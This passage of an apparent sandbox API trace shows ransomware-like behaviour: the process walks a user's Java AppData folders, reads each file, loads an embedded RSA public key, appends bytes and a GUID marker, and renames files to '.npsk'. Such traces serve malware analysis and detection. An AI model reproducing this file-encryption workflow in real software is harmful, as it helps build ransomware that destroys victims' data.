lpNewFilePointer=0x0) returned 1 [0217.847] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.847] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.847] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.847] CloseHandle (hObject=0x61c) returned 1 [0217.851] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.npsk")) returned 1 [0217.853] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 0 [0217.853] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.853] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.854] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0217.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0217.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0217.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.854] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.854] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.854] PathFindFileNameW (pszPath="") returned="" [0217.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.856] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.856] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1ea6db0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xfec5c570, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="deployment.properties", cAlternateFileName="DEPLOY~1.PRO")) returned 1 [0217.856] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned=".properties" [0217.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.857] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=719) returned 1 [0217.857] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.859] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.859] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.863] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x2cf, lpOverlapped=0x0) returned 1 [0217.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.863] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0217.864] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.864] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.864] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.864] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.864] GetLastError () returned 0x0 [0217.864] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.864] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0217.864] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.864] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.864] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.864] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.865] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.865] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.865] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.865] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.865] CloseHandle (hObject=0x61c) returned 1 [0217.867] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.npsk")) returned 1 [0217.868] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0217.868] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 1 [0217.868] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 0 [0217.868] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.869] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.869] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.869] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\") returned="jre1.7.0_45\\" [0217.869] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0217.869] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0217.869] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.869] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.869] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.869] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.869] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.869] PathFindFileNameW (pszPath="") returned="" [0217.869] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.870] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.870] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x182ac2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Data1.cab", cAlternateFileName="")) returned 1 [0217.870] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned=".cab" [0217.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.872] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=25340970) returned 1 [0217.872] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.874] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x182ac04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.875] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.877] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x25805, lpOverlapped=0x0) returned 1 [0217.880] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.880] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.880] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.880] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0217.881] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.881] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.881] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.882] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.882] GetLastError () returned 0x0 [0217.882] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.882] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0217.882] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.882] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.882] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.883] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.884] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x182ac2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.884] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.884] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.884] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.884] CloseHandle (hObject=0x61c) returned 1 [0218.357] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.npsk")) returned 1 [0218.359] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 1 [0218.359] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned=".msi" [0218.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0218.360] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=906752) returned 1 [0218.361] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0218.363] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xdd5da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.363] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0218.365] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.365] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x25805, lpOverlapped=0x0) returned 1 [0218.369] lstrlenA (lpString="-----BEGIN PUBLIC 